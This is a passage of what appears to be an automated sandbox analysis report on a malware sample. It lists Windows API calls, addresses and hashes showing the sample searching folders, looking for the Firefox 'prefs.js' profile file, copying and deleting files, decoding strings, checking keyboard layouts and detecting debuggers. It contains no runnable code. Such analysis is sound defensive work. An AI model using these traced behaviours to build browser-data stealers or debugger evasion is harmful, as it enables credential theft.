                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                                                                                  • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                  • String ID: prefs.js
                                                                                  • API String ID: 3334442632-3783873740
                                                                                  • Opcode ID: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                                                                  • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                                                                                  • Opcode Fuzzy Hash: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                                                                  • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,00401F2C,?,004251C4,?,?,00000000,?,00000000), ref: 00401923
                                                                                  • StrCmpCA.SHLWAPI(?,0042526C), ref: 00401973
                                                                                  • StrCmpCA.SHLWAPI(?,00425314), ref: 00401989
                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00401E32
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                                                  • String ID: \*.*
                                                                                  • API String ID: 1415058207-1173974218
                                                                                  • Opcode ID: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                                                                                  • Instruction ID: 47de987318eafb428d6e9afc63df3879dd5ba7490b623eb573f4dfe72a2f4575
                                                                                  • Opcode Fuzzy Hash: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                                                                                  • Instruction Fuzzy Hash: 641260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                                                                                  APIs
                                                                                  • wsprintfA.USER32 ref: 00B0EFA5
                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00B0EFBC
                                                                                  • StrCmpCA.SHLWAPI(?,00421538), ref: 00B0F012
                                                                                  • StrCmpCA.SHLWAPI(?,0042153C), ref: 00B0F028
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B0F515
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00B0F52A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 180737720-0
                                                                                  • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                                                                  • Instruction ID: 789b6f58862a7a35b9a9ee586bfcf15def032d39bfb309ff755d9bd75fc3ecd2
                                                                                  • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                                                                  • Instruction Fuzzy Hash: 7AE1F4719122189ADB58FB60DD92EEE77B9AF54700F8041D9B50A62092EF307FC9CF52
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                                                                                  • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                                                                                  • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                                                                                  • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 3334442632-0
                                                                                  • Opcode ID: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                                                                  • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                                                                                  • Opcode Fuzzy Hash: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                                                                  • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                    • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
                                                                                    • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 00B0DD52
                                                                                  • StrCmpCA.SHLWAPI(?,004214B4), ref: 00B0DD9A
                                                                                  • StrCmpCA.SHLWAPI(?,004214B8), ref: 00B0DDB0
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B0E033
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00B0E045
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 3334442632-0
                                                                                  • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                                                                  • Instruction ID: ac4f1198c4718f0efb0ef3ec8f52256198cf2f684def751de5740eac26a13441
                                                                                  • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                                                                  • Instruction Fuzzy Hash: 47915A729101049BCB14FBB4DE56DED7BBDAF95300F4086DCB44A96181FE34AB58CB92
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                    • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
                                                                                    • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 00B0F985
                                                                                  • StrCmpCA.SHLWAPI(?,004215BC), ref: 00B0F9D6
                                                                                  • StrCmpCA.SHLWAPI(?,004215C0), ref: 00B0F9EC
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B0FD18
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00B0FD2A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 3334442632-0
                                                                                  • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                                                                  • Instruction ID: 24e3c5e909d6c21ce66ecce2290cd882e8ffa157a861f60950e16346d437be4c
                                                                                  • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                                                                  • Instruction Fuzzy Hash: F5B14671A112189BCB24FF64DD96FFE77B9AF54300F4041E9A40A56591EF306B88CF92
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
                                                                                  • StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
                                                                                  • StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                                                  • String ID: \*.*$@
                                                                                  • API String ID: 433455689-2355794846
                                                                                  • Opcode ID: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                                                                                  • Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
                                                                                  • Opcode Fuzzy Hash: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                                                                                  • Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,?,?,004251C4,?,?,00000000,?,00000000), ref: 00B01B8A
                                                                                  • StrCmpCA.SHLWAPI(?,0042526C), ref: 00B01BDA
                                                                                  • StrCmpCA.SHLWAPI(?,00425314), ref: 00B01BF0
                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B01FA7
                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00B02031
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B02087
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00B02099
                                                                                    • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
                                                                                    • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 1415058207-0
                                                                                  • Opcode ID: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                                                                  • Instruction ID: f3f8f21c6a13d9fbcc2f1d75b9a1e2b212aa220394ad1d30336b6512133638c1
                                                                                  • Opcode Fuzzy Hash: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                                                                  • Instruction Fuzzy Hash: D312DA719112189BCB19EB60DD96EEEB7B9AF54700F8045D9B10A62091EF707FC8CF92
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 00B0E0C5
                                                                                  • StrCmpCA.SHLWAPI(?,004214C8), ref: 00B0E115
                                                                                  • StrCmpCA.SHLWAPI(?,004214CC), ref: 00B0E12B
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B0E647
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00B0E659
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 2325840235-0
                                                                                  • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                                                                  • Instruction ID: c43e3a507dfff06c59afea8bd812a8bac93871088d17f384b4e2afb88f7b4dd3
                                                                                  • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                                                                  • Instruction Fuzzy Hash: EBF1BC719252189ACB19FB60DD95EEEB7B9AF14700F8051DAB05E62091EF307FC8CE52
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                                                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                                                                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                                                                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                                                                                  • LocalFree.KERNEL32(00000000), ref: 00417D22
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                                                  • String ID: /
                                                                                  • API String ID: 3090951853-4001269591
                                                                                  • Opcode ID: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                                                                  • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                                                                                  • Opcode Fuzzy Hash: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                                                                  • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040C853
                                                                                  • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00906020), ref: 0040C871
                                                                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                                                                  • memcpy.MSVCRT(?,?,?), ref: 0040C912
                                                                                  • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                                                                  • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                                                                  • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                                                  • String ID:
                                                                                  • API String ID: 1498829745-0
                                                                                  • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                                                                  • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                                                                                  • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                                                                  • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00B0CABA
                                                                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00B0CAD8
                                                                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00B0CAE3
                                                                                  • memcpy.MSVCRT(?,?,?), ref: 00B0CB79
                                                                                  • lstrcat.KERNEL32(?,00420B46), ref: 00B0CBAA
                                                                                  • lstrcat.KERNEL32(?,00420B47), ref: 00B0CBBE
                                                                                  • lstrcat.KERNEL32(?,00420B4E), ref: 00B0CBDF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                                                  • String ID:
                                                                                  • API String ID: 1498829745-0
                                                                                  • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                                                                  • Instruction ID: f6585ddfe43c28543fffb4bbaec917ca5a2458f1f73ede1d87c764a7b5107ebb
                                                                                  • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                                                                  • Instruction Fuzzy Hash: 56415F7894421EEFDB10DFD0DD89BEEBBB8FB44304F1045A8E609A6280D7745A84CF91
                                                                                  APIs
                                                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                                                  • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: BinaryCryptLocalString$AllocFree
                                                                                  • String ID: N@
                                                                                  • API String ID: 4291131564-4229412743
                                                                                  • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                                                  • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                                                                                  • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                                                  • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                  • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00B17E48
                                                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00B17E60
                                                                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00B17E74
                                                                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00B17EC9
                                                                                  • LocalFree.KERNEL32(00000000), ref: 00B17F89
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                                                  • String ID:
                                                                                  • API String ID: 3090951853-0
                                                                                  • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                                                                  • Instruction ID: 148b1c726649969429fdfc8296d7d0a4d3d898fba3f62585704769e11de51e0b
                                                                                  • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                                                                  • Instruction Fuzzy Hash: B4413871951218ABCB24DB94DC89BEEB7B8FB44700F6041D9E00AA2191DB342FC5CFA1
                                                                                  APIs
                                                                                  • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                                                                                  • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                                                                                  Memory Dump Source
